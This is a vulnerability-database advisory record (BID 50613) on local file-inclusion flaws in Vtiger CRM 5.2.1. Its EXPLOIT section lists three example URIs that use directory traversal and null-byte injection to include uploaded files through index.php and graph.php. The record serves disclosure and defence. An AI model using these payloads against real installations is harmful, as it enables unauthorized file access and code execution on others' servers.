ID
VAR-E-201111-0475
TITLE
Vtiger CRM Multiple Local File Include Vulnerabilities
Trust: 0.3
DESCRIPTION
Vtiger CRM is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
Vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | vtiger | model: | crm | scope: | eq | version: | 5.2.1 | Trust: 0.3 |
EXPLOIT
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/index.php?module=Accounts&action=AccountsAjax&ajax=true&file=AddressChange& file=../../storage/2011/October/week3/UploadedFile.txt%00
http://www.example.com/graph.php?module=../storage/2011/October/week3/UploadedFile.txt%00
http://www.example.com/graph.php?module=1&action=../../storage/2011/October/week /UploadedFile.txt%00
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Input Validation Error
Trust: 0.3
CREDITS
High-Tech Bridge SA Security Research Lab
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 50613 | Trust: 0.3 |
REFERENCES
| url: | http://vtiger.com/blogs/?p=894 | Trust: 0.3 |
| url: | https://www.htbridge.ch/advisory/local_file_inclusion_in_vtigercrm.html | Trust: 0.3 |
| url: | http://www.vtiger.com/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 50613 |
LAST UPDATE DATE
2022-07-27T09:38:14.737000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 50613 | date: | 2011-11-09T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 50613 | date: | 2011-11-09T00:00:00 |